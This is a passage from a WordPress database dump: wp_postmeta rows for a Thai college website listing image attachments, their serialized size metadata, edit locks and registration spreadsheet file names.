\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27416, 11183, '_wp_attached_file', '2021/02/090264-01.jpg'),
(27417, 11183, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/090264-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"090264-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"090264-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"090264-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"090264-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"090264-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27418, 11172, '_thumbnail_id', '11183'),
(27421, 11172, '_hide_featured', NULL),
(27424, 11185, '_edit_lock', '1612750603:14'),
(27425, 11185, '_edit_last', '14'),
(27426, 11185, '_thumbnail_id', '11182'),
(27429, 11185, '_hide_featured', NULL),
(27432, 11187, '_edit_lock', '1612750678:14'),
(27433, 11187, '_edit_last', '14'),
(27434, 11187, '_thumbnail_id', '11181'),
(27437, 11187, '_hide_featured', NULL),
(27440, 11189, '_edit_lock', '1612750923:14'),
(27441, 11189, '_edit_last', '14'),
(27442, 11189, '_thumbnail_id', '11180'),
(27445, 11189, '_hide_featured', NULL),
(27452, 11191, '_edit_lock', '1612750840:14'),
(27453, 11191, '_edit_last', '14'),
(27454, 11191, '_thumbnail_id', '11179'),
(27457, 11191, '_hide_featured', NULL),
(27460, 11193, '_edit_lock', '1612751084:14'),
(27461, 11193, '_edit_last', '14'),
(27462, 11193, '_thumbnail_id', '11178'),
(27465, 11193, '_hide_featured', NULL),
(27470, 11195, '_edit_lock', '1612751121:14'),
(27471, 11195, '_edit_last', '14'),
(27472, 11195, '_thumbnail_id', '11177'),
(27475, 11195, '_hide_featured', NULL),
(27478, 11197, '_edit_lock', '1612751172:14'),
(27479, 11197, '_edit_last', '14'),
(27480, 11197, '_thumbnail_id', '11176'),
(27483, 11197, '_hide_featured', NULL),
(27486, 11199, '_edit_lock', '1612751452:14'),
(27487, 11199, '_edit_last', '14'),
(27488, 11199, '_thumbnail_id', '11175'),
(27491, 11199, '_hide_featured', NULL),
(27506, 11201, '_edit_lock', '1612751512:14'),
(27507, 11201, '_edit_last', '14'),
(27508, 11201, '_thumbnail_id', '11174'),
(27511, 11201, '_hide_featured', NULL),
(27514, 11203, '_edit_lock', '1612751838:14'),
(27515, 11203, '_edit_last', '14'),
(27516, 11203, '_thumbnail_id', '11173'),
(27519, 11203, '_hide_featured', NULL),
(27526, 11205, '_wp_attached_file', '2019/12/กำหนดการ-1.jpg'),
(27527, 11205, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:864;s:6:\"height\";i:144;s:4:\"file\";s:38:\"2019/12/กำหนดการ-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"กำหนดการ-1-150x144.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"กำหนดการ-1-300x50.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"กำหนดการ-1-768x128.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:37:\"กำหนดการ-1-400x67.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27528, 11206, '_wp_attached_file', '2019/12/ประกาศลงทะเบียน-1.jpg'),
(27529, 11206, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:864;s:6:\"height\";i:144;s:4:\"file\";s:59:\"2019/12/ประกาศลงทะเบียน-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"ประกาศลงทะเบียน-1-150x144.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"ประกาศลงทะเบียน-1-300x50.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"ประกาศลงทะเบียน-1-768x128.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"ประกาศลงทะเบียน-1-400x67.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27530, 11208, '_wp_attached_file', '2019/12/S__9560089.jpg'),
(27531, 11208, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1077;s:6:\"height\";i:1523;s:4:\"file\";s:22:\"2019/12/S__9560089.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"S__9560089-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"S__9560089-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"S__9560089-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"S__9560089-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"S__9560089-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27532, 11212, '_wp_attached_file', '2021/02/บัตรลงทะเบียนเรียน-โควตา-ปวส-2564-2.xls'),
(27533, 11213, '_wp_attached_file', '2021/02/บัตรลงทะเบียนเรียน-โควตา-ปวช-2564-1.xls'),
(27534, 11208, '_edit_lock', '1613438728:14'),
(27535, 11208, '_cg_img_link', ''),
(27536, 11208, '_cg_link_target', '_self'),
(27537, 11208, '_edit_last', '14'),
(27538, 11235, '_wp_attached_file', '2019/12/55922.jpg'),
(27539, 11235, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1517;s:4:\"file\";s:17:\"2019/12/55922.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"55922-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"55922-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"55922-768x1079.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1079;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"55922-729x1024.jpg\";s:5:\"width\";i:729;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"55922-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27540, 11236, '_wp_attached_file', '2019/12/55922.png'),
(27541, 11236, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1517;s:4:\"file\";s:17:\"2019/12/55922.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"55922-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"55922-214x300.png\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"55922-768x1079.png\";s:5:\"width\";i:768;s:6:\"height\";i:1079;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"55922-729x1024.png\";s:5:\"width\";i:729;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"55922-214x300.png\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27542, 11240, '_wp_attached_file', '2019/12/บัตรลงทะเบียนเรียน-โควตา-ปวส-2564-ใหม่.xls'),
(27543, 11241, '_wp_attached_file', '2019/12/บัตรลงทะเบียนเรียน-โควตา-ปวช-2564-ใหม่.xls'),
(27544, 11241, '_edit_lock', '1613736579:14'),
(27546, 11247, '_wp_attached_file', '2019/12/144977359_1298237780552407_7484903034801200145_o-1-1.jpg'),
(27547, 11247, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:64:\"2019/12/144977359_1298237780552407_7484903034801200145_o-1-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:64:\"144977359_1298237780552407_7484903034801200145_o-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:64:\"144977359_1298237780552407_7484903034801200145_o-1-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:64:\"144977359_1298237780552407_7484903034801200145_o-1-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:65:\"144977359_1298237780552407_7484903034801200145_o-1-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:64:\"144977359_1298237780552407_7484903034801200145_o-1-1-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27548, 11248, '_wp_attached_file', '2019/12/144977359_1298237780552407_7484903034801200145_o-1-2.jpg'),
(27549, 11248, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1707;s:6:\"height\";i:960;s:4:\"file\";s:64:\"2019/12/144977359_1298237780552407_7484903034801200145_o-1-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:64:\"144977359_1298237780552407_7484903034801200145_o-1-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:64:\"144977359_1298237780552407_7484903034801200145_o-1-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:64:\"144977359_1298237780552407_7484903034801200145_o-1-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:65:\"144977359_1298237780552407_7484903034801200145_o-1-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:64:\"144977359_1298237780552407_7484903034801200145_o-1-2-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27550, 11253, '_edit_lock', '1614065050:14'),
(27551, 11253, '_edit_last', '14'),
(27554, 11253, '_hide_featured', NULL),
(27559, 11256, '_edit_lock', '1614065591:14'),
(27560, 11256, '_edit_last', '14'),
(27563, 11256, '_hide_featured', NULL),
(27568, 11258, '_edit_lock', '1614066863:14'),
(27569, 11258, '_edit_last', '14'),
(27570, 11259, '_wp_attached_file', '2021/02/230264-09.jpg'),
(27571, 11259, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/230264-09.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"230264-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"230264-09-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"230264-09-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"230264-09-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"230264-09-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27572, 11260, '_wp_attached_file', '2021/02/230264-08.jpg'),
(27573, 11260, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/230264-08.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"230264-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"230264-08-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"230264-08-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"230264-08-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"230264-08-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27574, 11261, '_wp_attached_file', '2021/02/230264-07.jpg'),
(27575, 11261, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/230264-07.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"230264-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"230264-07-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"230264-07-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"230264-07-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"230264-07-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27576, 11262, '_wp_attached_file', '2021/02/230264-06.jpg'),
(27577, 11262, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/230264-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"230264-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"230264-06-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"230264-06-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"230264-06-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"230264-06-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27578, 11263, '_wp_attached_file', '2021/02/230264-05.jpg'),
(27579, 11263, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/230264-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"230264-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"230264-05-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"230264-05-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"230264-05-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"230264-05-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27580, 11264, '_wp_attached_file', '2021/02/230264-03.jpg'),
(27581, 11264, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/230264-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"230264-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"230264-03-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"230264-03-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"230264-03-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"230264-03-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27582, 11265, '_wp_attached_file', '2021/02/230264-01.jpg'),
(27583, 11265, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2021/02/230264-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"230264-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"230264-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"230264-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"230264-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"230264-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\"